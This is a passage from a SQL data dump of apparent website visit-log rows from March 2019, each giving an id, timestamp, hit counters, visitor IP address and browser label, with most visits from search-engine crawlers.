52','other'),(398183,1552330633,1,1,0,0,'54.36.150.26','other'),(398184,1552330811,1,1,0,0,'54.36.149.107','other'),(398185,1552330992,1,1,0,0,'46.229.168.153','other'),(398186,1552331503,1,1,0,0,'66.249.64.58','chrome'),(398187,1552331612,1,1,0,0,'54.36.149.80','other'),(398188,1552331799,1,1,0,0,'54.36.150.126','other'),(398189,1552332327,1,1,0,0,'207.46.13.243','other'),(398190,1552332336,1,1,0,0,'54.36.149.97','other'),(398191,1552332560,1,1,0,0,'54.36.148.7','other'),(398192,1552332627,1,1,0,0,'216.244.66.241','other'),(398193,1552332823,1,1,0,0,'207.46.13.114','other'),(398194,1552332912,1,1,0,0,'54.36.148.215','other'),(398195,1552333439,2,2,0,0,'66.249.64.30','chrome'),(398196,1552333575,1,1,0,0,'54.36.148.14','other'),(398197,1552333988,1,1,0,0,'54.36.149.1','other'),(398198,1552334118,1,1,0,0,'54.36.150.87','other'),(398199,1552334531,1,1,0,0,'54.36.150.82','other'),(398200,1552334653,1,1,0,0,'66.249.64.31','chrome'),(398201,1552334817,2,2,0,0,'8.29.198.27','other'),(398202,1552335018,1,1,0,0,'216.244.66.241','other'),(398203,1552335708,1,1,0,0,'95.163.255.43','other'),(398204,1552335866,1,1,0,0,'157.55.39.137','other'),(398205,1552336248,1,1,0,0,'46.229.168.150','other'),(398206,1552336343,1,1,0,0,'54.36.149.87','other'),(398207,1552336875,1,1,0,0,'54.36.150.156','other'),(398208,1552336971,1,1,0,0,'46.229.168.152','other'),(398209,1552337007,1,1,0,0,'157.55.39.135','other'),(398210,1552337023,1,1,0,0,'54.36.149.7','other'),(398211,1552337574,1,1,0,0,'216.244.66.241','other'),(398212,1552337582,1,1,0,0,'54.36.148.206','other'),(398213,1552337704,1,1,0,0,'207.46.13.243','other'),(398214,1552337771,2,2,0,0,'66.249.64.30','chrome'),(398215,1552337867,1,1,0,0,'54.36.150.79','other'),(398216,1552337911,1,1,0,0,'54.36.148.221','other'),(398217,1552338226,1,1,0,0,'46.229.168.130','other'),(398218,1552338369,1,1,0,0,'66.249.64.31','chrome'),(398219,1552338399,1,1,0,0,'54.36.150.40','other'),(398220,1552338400,1,1,0,0,'54.36.148.208','other'),(398221,1552338821,1,1,0,0,'54.36.149.105','other'),(398222,1552338896,1,1,0,0,'31.148.135.218','firefox'),(398223,1552338914,1,0,1,0,'66.249.64.30',''),(398224,1552338926,1,1,0,0,'54.36.150.163','other'),(398225,1552339386,1,1,0,0,'39.98.71.133','other'),(398226,1552339564,1,1,0,0,'54.36.148.87','other'),(398227,1552339651,1,1,0,0,'91.209.11.236','other'),(398228,1552340321,1,1,0,0,'46.229.168.152','other'),(398229,1552340371,1,1,0,0,'66.249.64.31','chrome'),(398230,1552340884,1,1,0,0,'207.46.13.97','other'),(398231,1552341404,1,1,0,0,'54.36.150.108','other'),(398232,1552341542,1,1,0,0,'91.209.11.236','other'),(398233,1552341942,1,1,0,0,'66.249.64.62','chrome'),(398234,1552342106,1,1,0,0,'52.53.201.78','chrome'),(398235,1552342229,1,1,0,0,'54.36.150.186','other'),(398236,1552342295,1,1,0,0,'66.249.64.30','chrome'),(398237,1552342603,1,1,0,0,'54.36.150.98','other'),(398238,1552343041,1,1,0,0,'54.36.148.110','other'),(398239,1552343225,1,1,0,0,'54.36.150.56','other'),(398240,1552343572,1,1,0,0,'216.244.66.241','other'),(398241,1552343968,1,1,0,0,'54.36.150.107','other'),(398242,1552344035,1,1,0,0,'46.229.168.141','other'),(398243,1552344042,1,1,0,0,'54.36.149.34','other'),(398244,1552344127,1,1,0,0,'37.115.186.35','chrome'),(398245,1552344181,1,1,0,0,'54.36.148.254','other'),(398246,1552344250,1,1,0,0,'54.36.148.27','other'),(398247,1552344552,1,1,0,0,'141.8.142.103','other'),(398248,1552344614,1,1,0,0,'5.45.207.19','other'),(398249,1552344678,2,2,0,0,'95.108.213.4','other'),(398250,1552344733,3,3,0,0,'178.154.244.11','other'),(398251,1552344759,1,1,0,0,'5.45.207.79','other'),(398252,1552344822,1,1,0,0,'46.229.168.148','other'),(398253,1552344869,1,1,0,0,'87.250.224.65','other'),(398254,1552345083,1,1,0,0,'66.249.64.31','chrome'),(398255,1552345259,1,1,0,0,'66.249.64.62','chrome'),(398256,1552345327,1,1,0,0,'66.249.64.29','chrome'),(398257,1552345666,1,1,0,0,'66.249.64.30','chrome'),(398258,1552345674,2,2,0,0,'8.29.198.26','other'),(398259,1552345770,1,1,0,0,'54.36.150.164','other'),(398260,1552345814,5,5,0,0,'5.45.207.19','other'),(398261,1552345983,3,3,0,0,'178.154.244.11','other'),(398262,1552346479,2,2,0,0,'141.8.142.103','other'),(398263,1552346560,3,3,0,0,'5.45.207.79','other'),(398264,1552346597,1,1,0,0,'54.36.150.166','other'),(398265,1552346740,1,1,0,0,'5.45.207.19','other'),(398266,1552346840,1,1,0,0,'54.36.148.113','other'),(398267,1552347055,2,2,0,0,'66.249.64.29','chrome'),(398268,1552347063,1,1,0,0,'54.36.150.171','other'),(398269,1552347079,1,1,0,0,'66.249.64.31','chrome'),(398270,1552347418,1,1,0,0,'66.249.64.60','chrome'),(398271,1552347953,1,1,0,0,'46.229.168.147','other'),(398272,1552347987,1,1,0,0,'157.55.39.135','other'),(398273,1552348213,1,1,0,0,'54.36.150.144','other'),(398274,1552348348,1,1,0,0,'91.209.11.236','other'),(398275,1552348871,1,1,0,0,'54.36.148.83','other'),(398276,1552349101,1,1,0,0,'66.249.64.29','chrome'),(398277,1552349118,1,1,0,0,'178.154.244.11','other'),(398278,1552349269,1,1,0,0,'54.36.148.64','other'),(398279,1552349302,1,1,0,0,'157.55.39.248','other'),(398280,1552349592,1,1,0,0,'207.46.13.97','other'),(398281,1552349771,1,1,0,0,'54.36.148.125','other'),(398282,1552350270,1,1,0,0,'178.154.244.11','other'),(398283,1552350414,1,1,0,0,'54.36.150.17','other'),(398284,1552350424,2,2,0,0,'66.249.64.29','chrome'),(398285,1552350493,1,1,0,0,'54.36.150.189','other'),(398286,1552350495,1,1,0,0,'54.36.148.230','other'),(398287,1552350497,1,1,0,0,'207.46.13.97','other'),(398288,1552350546,1,1,0,0,'46.229.168.135','other'),(398289,1552350609,1,1,0,0,'66.249.64.62','chrome'),(398290,1552350650,1,1,0,0,'54.36.150.111','other'),(398291,1552350925,1,1,0,0,'46.229.168.130','other'),(398292,1552350953,1,1,0,0,'54.36.148.229','other'),(398293,1552351173,1,1,0,0,'66.249.64.31','chrome'),(398294,1552351316,1,1,0,0,'66.249.64.60','chrome'),(398295,1552352358,1,1,0,0,'54.36.148.36','other'),(398296,1552352720,1,1,0,0,'66.249.64.30','chrome'),(398297,1552352804,1,1,0,0,'46.229.168.134','other'),(398298,1552353039,2,2,0,0,'66.249.64.31','chrome'),(398299,1552353552,1,1,0,0,'54.36.150.11','other'),(398300,1552353642,1,0,1,0,'66.249.64.60',''),(398301,1552353974,1,1,0,0,'54.36.150.146','other'),(398302,1552354025,1,1,0,0,'207.46.13.97','other'),(398303,1552354299,1,1,0,0,'66.249.64.62','chrome'),(398304,1552354375,2,2,0,0,'66.249.64.30','chrome'),(398305,1552354880,1,1,0,0,'54.36.149.7','other'),(398306,1552355296,2,2,0,0,'66.249.64.29','chrome'),(398307,1552355576,1,1,0,0,'66.249.64.60','chrome'),(398308,1552355580,1,1,0,0,'66.249.64.31','chrome'),(398309,1552355732,2,2,0,0,'66.249.64.30','chrome'),(398310,1552356045,1,1,0,0,'54.36.150.71','other'),(398311,1552356148,1,1,0,0,'5.35.95.22','msie'),(398312,1552356262,2,2,0,0,'34.220.134.196','chrome'),(398313,1552356381,1,1,0,0,'66.249.64.29','chrome'),(398314,1552356525,1,1,0,0,'8.29.198.27','other'),(398315,1552356591,1,1,0,0,'8.29.198.26','other'),(398316,1552356592,1,1,0,0,'54.36.150.154','other'),(398317,1552356665,1,1,0,0,'5.45.207.19','other'),(398318,1552356952,1,1,0,0,'54.36.148.96','other'),(398319,1552356978,1,1,0,0,'87.250.224.47','other'),(398320,1552356987,1,1,0,0,'54.36.149.92','other'),(398321,1552357241,1,1,0,0,'54.36.148.52','other'),(398322,1552357435,1,1,0,0,'54.36.149.103','other'),(398323,1552357546,1,1,0,0,'66.249.64.31','chrome'),(398324,1552357649,1,1,0,0,'66.249.64.29','chrome'),(398325,1552357693,2,2,0,0,'66.249.64.30','chrome'),(398326,1552357960,1,1,0,0,'54.36.148.237','other'),(398327,1552358090,2,2,0,0,'157.55.39.135','other'),(398328,1552358143,1,1,0,0,'157.55.39.215','other'),(398329,1552358458,1,1,0,0,'46.229.168.151','other'),(398330,1552358586,1,1,0,0,'54.36.148.232','other'),(398331,1552358637,1,1,0,0,'54.36.149.45','other'),(398332,1552358940,1,1,0,0,'66.249.64.29','chrome'),(398333,1552359000,1,1,0,0,'216.244.66.241','other'),(398334,1552359612,1,1,0,0,'46.229.168.148','other'),(398335,1552359709,1,1,0,0,'54.36.150.145','other'),(398336,1552360005,1,1,0,0,'46.229.168.138','other'),(398337,1552360152,1,1,0,0,'54.36.148.84','other'),(398338,1552360212,1,1,0,0,'66.249.64.29','chrome'),(398339,1552360465,1,1,0,0,'54.36.150.22','other'),(398340,1552360681,1,1,0,0,'54.36.150.112','other'),(398341,1552360910,1,1,0,0,'54.36.150.63','other'),(398342,1552360924,1,1,0,0,'54.36.149.14','other'),(398343,1552361138,1,1,0,0,'66.249.64.30','chrome'),(398344,1552361178,1,1,0,0,'46.229.168.135','other'),(398345,1552361232,1,1,0,0,'66.249.64.58','chrome'),(398346,1552361252,1,1,0,0,'66.249.64.60','chrome'),(398347,1552361317,1,1,0,0,'46.229.168.132','other'),(398348,1552361641,1,1,0,0,'54.36.150.60','other'),(398349,1552361733,1,1,0,0,'216.244.66.241','other'),(398350,1552362023,2,2,0,0,'66.249.64.29','chrome'),(398351,1552362044,1,1,0,0,'207.46.13.97','other'),(398352,1552362223,1,1,0,0,'54.36.150.79','other'),(398353,1552362433,1,1,0,0,'54.36.148.91','other'),(398354,1552362451,2,2,0,0,'66.249.64.30','chrome'),(398355,1552362831,1,1,0,0,'54.36.150.114','other'),(398356,1552362926,1,1,0,0,'54.36.150.112','other'),(398357,1552363067,1,1,0,0,'54.36.148.11','other'),(398358,1552363136,1,1,0,0,'66.249.64.29','chrome'),(398359,1552363307,2,2,0,0,'66.249.64.58','chrome'),(398360,1552363335,1,1,0,0,'54.36.150.161','other'),(398361,1552363774,1,1,0,0,'66.249.64.30','chrome'),(398362,1552363879,1,1,0,0,'54.36.149.85','other'),(398363,1552364085,1,1,0,0,'54.36.150.46','other'),(398364,1552364111,1,1,0,0,'141.8.142.103','other'),(398365,1552364237,1,1,0,0,'46.229.168.149','other'),(398366,1552364292,3,3,0,0,'5.45.207.79','other'),(398367,1552364305,1,1,0,0,'54.36.150.168','other'),(398368,1552364443,1,1,0,0,'46.229.168.146','other'),(398369,1552364451,1,1,0,0,'54.36.149.28','other'),(398370,1552364457,2,2,0,0,'95.108.213.4','other'),(398371,1552364560,1,1,0,0,'157.55.39.215','other'),(398372,1552364642,1,1,0,0,'66.249.64.29','chrome'),(398373,1552364823,1,1,0,0,'5.45.207.19','other'),(398374,1552364973,1,1,0,0,'54.36.149.57','other'),(398375,1552365363,1,1,0,0,'46.229.168.132','other'),(398376,1552365736,1,1,0,0,'157.55.39.215','other'),(398377,1552365941,1,1,0,0,'54.36.148.97','other'),(398378,1552366052,1,1,0,0,'66.249.64.29','chrome'),(398379,1552366335,1,1,0,0,'66.249.64.60','chrome'),(398380,1552366508,1,1,0,0,'54.36.148.158','other'),(398381,1552366685,1,1,0,0,'54.36.150.34','other'),(398382,1552366978,1,1,0,0,'46.229.168.134','other'),(398383,1552366979,1,1,0,0,'54.36.150.154','other'),(398384,1552367248,1,1,0,0,'66.249.64.30','chrome'),(398385,1552367386,1,1,0,0,'8.29.198.26','other'),(398386,1552367442,1,1,0,0,'8.29.198.25','other'),(398387,1552367538,2,2,0,0,'66.249.64.29','chrome'),(398388,1552367756,1,1,0,0,'5.45.207.19','other'),(398389,1552368375,1,1,0,0,'46.229.168.138','other'),(398390,1552368382,1,1,0,0,'54.36.148.101','other'),(398391,1552368392,1,1,0,0,'66.249.64.31','chrome'),(398392,1552368719,3,3,0,0,'66.249.64.29','chrome'),(398393,1552368819,1,1,0,0,'66.249.64.58','chrome'),(398394,1552369378,1,1,0,0,'5.188.210.44','chrome'),(398395,1552369419,1,1,0,0,'157.55.39.104','other'),(398396,1552369424,1,1,0,0,'54.36.150.28','other'),(398397,1552369742,1,1,0,0,'46.229.168.137','other'),(398398,1552369820,1,1,0,0,'54.36.150.143','other'),(398399,1552369851,1,1,0,0,'54.36.150.150','other'),(398400,1552369884,1,1,0,0,'66.249.64.30','chrome'),(398401,1552369956,1,1,0,0,'46.229.168.150','other'),(398402,1552370040,1,1,0,0,'46.229.168.141','other'),(398403,1552370081,1,1,0,0,'54.36.148.148','other'),(398404,1552370383,1,1,0,0,'91.196.178.132','firefox'),(398405,1552370399,1,1,0,0,'180.163.220.66','chrome'),(398406,1552370904,1,1,0,0,'66.249.64.30','chrome'),(398407,1552371071,1,1,0,0,'54.36.150.62','other'),(398408,1552371201,1,1,0,0,'54.36.148.127','other'),(398409,1552371714,1,1,0,0,'46.229.168.135','other'),(398410,1552371762,1,1,0,0,'94.178.31.90','chrome'),(398411,1552371932,1,1,0,0,'37.187.129.166','other'),(398412,1552372219,1,1,0,0,'46.229.168.145','other'),(398413,1552372225,1,1,0,0,'66.249.64.29','chrome'),(398414,1552372264,1,1,0,0,'66.249.64.58','chrome'),(398415,1552372278,1,1,0,0,'66.249.64.60','chrome'),(398416,1552372301,1,1,0,0,'54.36.148.158','other'),(398417,1552372529,1,1,0,0,'54.36.149.51','other'),(398418,1552372556,1,1,0,0,'54.36.148.140','other'),(398419,1552372798,1,1,0,0,'54.36.150.190','other'),(398420,1552372819,1,1,0,0,'46.166.190.133','other'),(398421,1552372935,1,1,0,0,'180.76.15.17','other'),(398422,1552372963,1,1,0,0,'54.36.150.17','other'),(398423,1552373074,1,1,0,0,'54.36.149.95','other'),(398424,1552373219,1,1,0,0,'46.229.168.132','other'),(398425,1552373540,1,1,0,0,'66.249.64.62','chrome'),(398426,1552373558,1,1,0,0,'54.36.148.184','other'),(398427,1552373812,1,1,0,0,'54.36.150.122','other'),(398428,1552374025,1,1,0,0,'207.46.13.97','other'),(398429,1552374330,2,2,0,0,'66.249.64.29','chrome'),(398430,1552374548,1,1,0,0,'66.249.64.31','chrome'),(398431,1552374763,1,1,0,0,'54.36.148.129','other'),(398432,1552374866,1,1,0,0,'91.196.178.69','firefox'),(398433,1552374874,1,1,0,0,'66.249.64.60','chrome'),(398434,1552374881,2,2,0,0,'40.77.167.119','other'),(398435,1552374914,1,1,0,0,'54.36.148.145','other'),(398436,1552375325,1,1,0,0,'216.244.66.241','other'),(398437,1552375538,1,1,0,0,'46.229.168.141','other'),(398438,1552376641,1,1,0,0,'66.249.64.60','chrome'),(398439,1552376911,1,1,0,0,'66.249.64.30','chrome'),(398440,1552377107,1,1,0,0,'40.77.167.119','other'),(398441,1552377157,2,2,0,0,'66.249.64.31','chrome'),(398442,1552377255,1,1,0,0,'66.249.64.29','chrome'),(398443,1552377465,1,1,0,0,'54.36.149.67','other'),(398444,1552377514,1,1,0,0,'193.34.216.141','chrome'),(398445,1552377760,1,1,0,0,'54.36.149.88','other'),(398446,1552377891,1,1,0,0,'46.229.168.152','other'),(398447,1552378042,1,1,0,0,'54.36.148.105','other'),(398448,1552378123,2,1,1,0,'66.249.64.31',''),(398449,1552378224,2,2,0,0,'91.196.178.168','chrome'),(398450,1552378252,1,1,0,0,'8.29.198.26','other'),(398451,1552378292,1,1,0,0,'8.29.198.27','other'),(398452,1552378349,1,1,0,0,'66.249.64.30','chrome'),(398453,1552378405,1,1,0,0,'54.36.148.74','other'),(398454,1552378562,1,1,0,0,'51.15.249.96','other'),(398455,1552378679,1,1,0,0,'54.36.148.163','other'),(398456,1552378695,1,1,0,0,'46.229.168.133','other'),(398457,1552379474,1,1,0,0,'54.36.150.46','other'),(398458,1552379571,1,1,0,0,'66.249.64.30','chrome'),(398459,1552379689,1,1,0,0,'66.249.64.31','chrome'),(398460,1552380745,1,1,0,0,'46.229.168.141','other'),(398461,1552380832,1,1,0,0,'66.249.64.29','chrome'),(398462,1552380844,1,1,0,0,'91.196.178.74','firefox'),(398463,1552380948,1,1,0,0,'54.36.150.92','other'),(398464,1552381173,1,1,0,0,'54.36.148.58','other'),(398465,1552381677,1,1,0,0,'54.36.148.124','other'),(398466,1552381879,1,1,0,0,'180.76.15.140','other'),(398467,1552381968,1,1,0,0,'54.36.149.100','other'),(398468,1552382161,1,1,0,0,'40.77.167.96','other'),(398469,1552382242,1,1,0,0,'185.93.186.226','chrome'),(398470,1552382287,1,1,0,0,'46.229.168.133','other'),(398471,1552382333,1,1,0,0,'130.180.220.251','chrome'),(398472,1552382548,1,1,0,0,'91.196.178.90','chrome'),(398473,1552382761,1,1,0,0,'207.46.13.8','other'),(398474,1552383129,1,1,0,0,'216.244.66.241','other'),(398475,1552383242,1,1,0,0,'54.36.150.156','other'),(398476,1552383369,1,1,0,0,'54.36.148.82','other'),(398477,1552383485,1,1,0,0,'95.134.202.37','chrome'),(398478,1552383794,1,1,0,0,'54.36.148.189','other'),(398479,1552383905,1,1,0,0,'91.196.178.99','chrome'),(398480,1552383914,1,1,0,0,'66.249.64.30','chrome'),(398481,1552383921,1,1,0,0,'5.45.207.79','other'),(398482,1552384004,1,1,0,0,'87.250.224.47','other'),(398483,1552384273,1,1,0,0,'40.77.167.96','other'),(398484,1552384327,1,1,0,0,'54.36.149.73','other'),(398485,1552384614,1,1,0,0,'46.229.168.149','other'),(398486,1552384698,1,1,0,0,'46.229.168.152','other'),(398487,1552384714,1,1,0,0,'66.249.64.29','chrome'),(398488,1552385225,1,1,0,0,'54.36.150.64','other'),(398489,1552385461,1,1,0,0,'54.36.150.55','other'),(398490,1552385696,1,1,0,0,'54.36.150.174','other'),(398491,1552385724,1,1,0,0,'40.77.167.96','other'),(398492,1552385992,1,1,0,0,'216.244.66.241','other'),(398493,1552386232,2,2,0,0,'66.249.64.30','chrome'),(398494,1552386300,1,1,0,0,'54.36.149.43','other'),(398495,1552386407,1,1,0,0,'178.95.202.185','chrome'),(398496,1552386661,1,1,0,0,'54.36.149.68','other'),(398497,1552386715,1,1,0,0,'207.46.13.8','other'),(398498,1552386726,1,1,0,0,'5.45.207.19','other'),(398499,1552387370,1,1,0,0,'46.229.168.133','other'),(398500,1552387596,1,1,0,0,'54.36.150.81','other'),(398501,1552387712,1,1,0,0,'54.36.150.32','other'),(398502,1552388281,1,1,0,0,'54.36.148.168','other'),(398503,1552388292,1,1,0,0,'54.36.148.142','other'),(398504,1552388293,1,1,0,0,'207.46.13.83','other'),(398505,1552388373,1,1,0,0,'46.229.168.138','other'),(398506,1552388482,1,1,0,0,'54.36.148.166','other'),(398507,1552388487,2,2,0,0,'37.53.228.207','chrome'),(398508,1552388572,1,1,0,0,'95.108.181.54','other'),(398509,1552388675,2,2,0,0,'66.249.64.29','chrome'),(398510,1552388892,2,2,0,0,'66.249.64.30','chrome'),(398511,1552388916,1,1,0,0,'46.229.168.130','other'),(398512,1552389106,1,1,0,0,'8.29.198.25','other'),(398513,1552389142,1,1,0,0,'8.29.198.27','other'),(398514,1552389320,1,1,0,0,'54.36.148.52','other'),(398515,1552389987,1,1,0,0,'207.46.13.8','other'),(398516,1552390078,1,1,0,0,'66.249.64.30','chrome'),(398517,1552390092,1,1,0,0,'66.249.64.29','chrome'),(398518,1552390367,1,1,0,0,'66.249.64.31','chrome'),(398519,1552390667,1,1,0,0,'66.249.64.62','chrome'),(398520,1552391176,1,1,0,0,'216.244.66.241','other'),(398521,1552391473,1,1,0,0,'54.36.150.105','other'),(398522,1552391786,1,1,0,0,'66.249.64.31','chrome'),(398523,1552391806,1,1,0,0,'176.14.37.74','msie'),(398524,1552391829,1,1,0,0,'54.36.150.78','other'),(398525,1552392030,1,1,0,0,'46.229.168.130','other'),(398526,1552392087,1,1,0,0,'46.229.168.149','other'),(398527,1552392105,1,1,0,0,'178.154.244.11','other'),(398528,1552392324,1,1,0,0,'54.36.148.96','other'),(398529,1552392745,1,1,0,0,'46.229.168.137','other'),(398530,1552392976,1,1,0,0,'141.8.142.103','other'),(398531,1552393148,1,1,0,0,'54.36.150.48','other'),(398532,1552393161,1,1,0,0,'95.163.255.45','other'),(398533,1552393176,1,1,0,0,'46.229.168.136','other'),(398534,1552393335,1,1,0,0,'46.211.97.83','chrome'),(398535,1552393348,1,1,0,0,'207.46.13.97','other'),(398536,1552393444,1,1,0,0,'54.36.149.83','other'),(398537,1552393699,1,1,0,0,'66.249.64.60','chrome'),(398538,1552393872,1,1,0,0,'5.45.207.19','other'),(398539,1552393935,1,1,0,0,'66.249.64.29','chrome'),(398540,1552394009,1,1,0,0,'66.249.64.31','chrome'),(398541,1552394255,1,1,0,0,'54.36.148.24','other'),(398542,1552394429,1,1,0,0,'54.36.150.150','other'),(398543,1552394833,1,1,0,0,'91.196.177.176','chrome'),(398544,1552395334,1,1,0,0,'66.249.64.62','chrome'),(398545,1552395339,1,1,0,0,'54.36.150.57','other'),(398546,1552395380,1,1,0,0,'46.229.168.150','other'),(398547,1552395451,2,2,0,0,'54.36.149.55','other'),(398548,1552395683,2,2,0,0,'66.249.64.31','chrome'),(398549,1552395766,1,1,0,0,'54.36.150.55','other'),(398550,1552395904,1,1,0,0,'5.45.207.19','other'),(398551,1552396142,1,1,0,0,'54.36.150.71','other'),(398552,1552396143,1,1,0,0,'46.166.186.224','other'),(398553,1552396579,1,1,0,0,'54.36.150.191','other'),(398554,1552396728,1,1,0,0,'66.249.64.58','chrome'),(398555,1552396735,1,1,0,0,'54.36.149.19','other'),(398556,1552397238,1,1,0,0,'66.249.64.60','chrome'),(398557,1552397289,2,2,0,0,'178.92.249.154','chrome'),(398558,1552397331,1,1,0,0,'66.249.64.30','chrome'),(398559,1552397352,1,1,0,0,'207.46.13.83','other'),(398560,1552397616,1,1,0,0,'66.249.64.29','chrome'),(398561,1552397858,1,1,0,0,'66.249.64.58','chrome'),(398562,1552397891,1,1,0,0,'66.249.64.31','chrome'),(398563,1552398306,1,1,0,0,'95.108.181.54','other'),(398564,1552398382,1,1,0,0,'207.46.13.250','other'),(398565,1552398552,1,1,0,0,'66.249.64.30','chrome'),(398566,1552398762,1,1,0,0,'54.36.149.19','other'),(398567,1552398772,1,1,0,0,'54.36.149.86','other'),(398568,1552398775,1,1,0,0,'5.45.207.19','other'),(398569,1552398797,2,2,0,0,'5.45.207.79','other'),(398570,1552398836,1,1,0,0,'54.36.150.33','other'),(398571,1552398954,1,1,0,0,'195.225.147.207','chrome'),(398572,1552399148,1,1,0,0,'157.55.39.236','other'),(398573,1552399215,1,1,0,0,'66.249.64.60','chrome'),(398574,1552399237,1,1,0,0,'66.249.64.29','chrome'),(398575,1552399394,1,1,0,0,'54.36.148.204','other'),(398576,1552399656,1,1,0,0,'207.46.13.8','other'),(398577,1552399987,2,2,0,0,'8.29.198.26','other'),(398578,1552400001,1,1,0,0,'54.36.148.78','other'),(398579,1552400180,1,1,0,0,'54.36.150.93','other'),(398580,1552400370,1,1,0,0,'54.36.148.21','other'),(398581,1552400437,1,1,0,0,'157.55.39.236','other'),(398582,1552400464,1,1,0,0,'66.249.64.60','chrome'),(398583,1552400477,1,1,0,0,'54.36.150.65','other'),(398584,1552400577,1,1,0,0,'66.249.64.30','chrome'),(398585,1552400710,1,1,0,0,'54.36.148.200','other'),(398586,1552400798,2,2,0,0,'207.46.13.8','other'),(398587,1552401096,3,3,0,0,'66.249.64.58','chrome'),(398588,1552401136,1,1,0,0,'82.207.57.50','chrome'),(398589,1552401213,1,1,0,0,'54.36.148.86','other'),(398590,1552401397,1,1,0,0,'54.36.150.37','other'),(398591,1552401814,1,1,0,0,'216.244.66.241','other'),(398592,1552401998,2,2,0,0,'66.249.64.31','chrome'),(398593,1552402215,1,1,0,0,'46.188.42.169','chrome'),(398594,1552402270,2,2,0,0,'207.46.13.56','other'),(398595,1552402321,2,2,0,0,'66.249.64.30','chrome'),(398596,1552402404,1,1,0,0,'66.249.64.58','chrome'),(398597,1552402619,1,1,0,0,'54.36.148.69','other'),(398598,1552402769,1,1,0,0,'54.36.150.103','other'),(398599,1552402901,1,1,0,0,'91.196.178.93','firefox'),(398600,1552402960,1,1,0,0,'5.45.207.79','other'),(398601,1552403224,1,1,0,0,'54.36.148.19','other'),(398602,1552403550,1,1,0,0,'178.154.244.11','other'),(398603,1552403559,1,1,0,0,'54.36.148.250','other'),(398604,1552403633,1,1,0,0,'54.36.148.2','other'),(398605,1552403672,1,1,0,0,'91.196.177.46','firefox'),(398606,1552403711,1,1,0,0,'66.249.64.62','chrome'),(398607,1552403870,2,2,0,0,'216.244.66.241','other'),(398608,1552403894,1,1,0,0,'54.36.148.49','other'),(398609,1552404111,1,1,0,0,'54.36.150.177','other'),(398610,1552404273,1,1,0,0,'54.36.150.25','other'),(398611,1552404506,1,1,0,0,'46.211.200.61','firefox'),(398612,1552404583,1,1,0,0,'91.225.58.227','chrome'),(398613,1552404678,1,1,0,0,'66.249.64.29','chrome'),(398614,1552404868,1,1,0,0,'40.77.167.96','other'),(398615,1552405007,1,1,0,0,'46.166.186.203','other'),(398616,1552405109,2,2,0,0,'66.249.64.30','chrome'),(398617,1552405115,1,1,0,0,'54.36.148.22','other'),(398618,1552405142,1,1,0,0,'54.36.149.10','other'),(398619,1552405438,1,1,0,0,'207.46.13.56','other'),(398620,1552405449,1,1,0,0,'66.249.64.31','chrome'),(398621,1552405577,1,1,0,0,'54.36.148.118','other'),(398622,1552405745,1,1,0,0,'91.196.178.68','firefox'),(398623,1552406139,1,1,0,0,'46.229.168.129','other'),(398624,1552406199,1,1,0,0,'66.249.64.30','chrome'),(398625,1552406227,2,2,0,0,'66.249.64.29','chrome'),(398626,1552406415,1,1,0,0,'66.249.64.60','chrome'),(398627,1552406774,3,3,0,0,'66.249.64.31','chrome'),(398628,1552406786,1,1,0,0,'54.36.148.57','other'),(398629,1552406948,1,1,0,0,'46.229.168.150','other'),(398630,1552407323,1,1,0,0,'66.249.64.29','chrome'),(398631,1552407350,1,1,0,0,'54.36.150.115','other'),(398632,1552407471,1,1,0,0,'66.249.64.30','chrome'),(398633,1552407656,1,1,0,0,'207.46.13.250','other'),(398634,1552407768,1,1,0,0,'40.77.167.96','other'),(398635,1552407918,1,1,0,0,'54.36.148.167','other'),(398636,1552408173,1,1,0,0,'91.196.178.48','chrome'),(398637,1552408179,1,1,0,0,'54.36.148.33','other'),(398638,1552408252,1,1,0,0,'54.36.149.100','other'),(398639,1552408358,2,2,0,0,'66.249.64.29','chrome'),(398640,1552408628,1,1,0,0,'140.143.90.193','other'),(398641,1552408647,2,2,0,0,'66.249.64.31','chrome'),(398642,1552408668,1,1,0,0,'66.249.64.60','chrome'),(398643,1552408695,1,1,0,0,'54.36.148.159','other'),(398644,1552409122,1,1,0,0,'54.36.148.18','other'),(398645,1552409620,1,1,0,0,'54.36.148.100','other'),(398646,1552409636,1,1,0,0,'54.36.148.122','other'),(398647,1552409666,1,1,0,0,'54.36.150.145','other'),(398648,1552409718,1,1,0,0,'54.36.148.242','other'),(398649,1552409771,1,1,0,0,'54.36.148.64','other'),(398650,1552409828,1,1,0,0,'216.244.66.241','other'),(398651,1552410018,1,1,0,0,'66.249.64.31','chrome'),(398652,1552410062,2,2,0,0,'40.77.167.96','other'),(398653,1552410165,1,1,0,0,'54.36.150.92','other'),(398654,1552410196,1,1,0,0,'141.8.142.103','other'),(398655,1552410226,1,1,0,0,'54.36.149.96','other'),(398656,1552410247,1,1,0,0,'54.36.150.105','other'),(398657,1552410333,1,1,0,0,'66.249.64.29','chrome'),(398658,1552410492,1,1,0,0,'54.36.149.101','other'),(398659,1552410846,1,1,0,0,'8.29.198.26','other'),(398660,1552410879,1,1,0,0,'8.29.198.27','other'),(398661,1552411159,1,1,0,0,'141.8.142.103','other'),(398662,1552411514,1,1,0,0,'54.36.150.151','other'),(398663,1552411555,1,1,0,0,'54.36.148.220','other'),(398664,1552411710,1,1,0,0,'54.36.150.93','other'),(398665,1552412024,1,1,0,0,'66.249.64.30','chrome'),(398666,1552412177,1,1,0,0,'216.244.66.241','other'),(398667,1552412358,2,2,0,0,'66.249.64.31','chrome'),(398668,1552412427,1,1,0,0,'54.36.150.22','other'),(398669,1552412442,1,1,0,0,'46.229.168.148','other'),(398670,1552412539,3,3,0,0,'66.249.64.58','chrome'),(398671,1552412724,1,1,0,0,'54.36.148.117','other'),(398672,1552412839,1,1,0,0,'46.229.168.130','other'),(398673,1552412868,1,1,0,0,'207.46.13.56','other'),(398674,1552412911,1,1,0,0,'54.36.150.92','other'),(398675,1552413079,1,1,0,0,'109.248.149.44','chrome'),(398676,1552413236,3,3,0,0,'66.249.64.60','chrome'),(398677,1552413383,2,2,0,0,'66.249.64.29','chrome'),(398678,1552413536,2,2,0,0,'66.249.64.58','chrome'),(398679,1552413687,1,1,0,0,'180.76.15.139','other'),(398680,1552413710,1,1,0,0,'46.229.168.150','other'),(398681,1552413815,1,1,0,0,'66.249.64.62','chrome'),(398682,1552414588,1,1,0,0,'40.77.167.96','other'),(398683,1552414599,1,1,0,0,'66.249.64.60','chrome'),(398684,1552414723,1,1,0,0,'54.36.148.49','other'),(398685,1552414868,1,1,0,0,'54.36.150.186','other'),(398686,1552414916,1,1,0,0,'207.46.13.250','other'),(398687,1552415541,1,1,0,0,'66.249.64.62','chrome'),(398688,1552416176,1,1,0,0,'46.229.168.146','other'),(398689,1552416365,1,1,0,0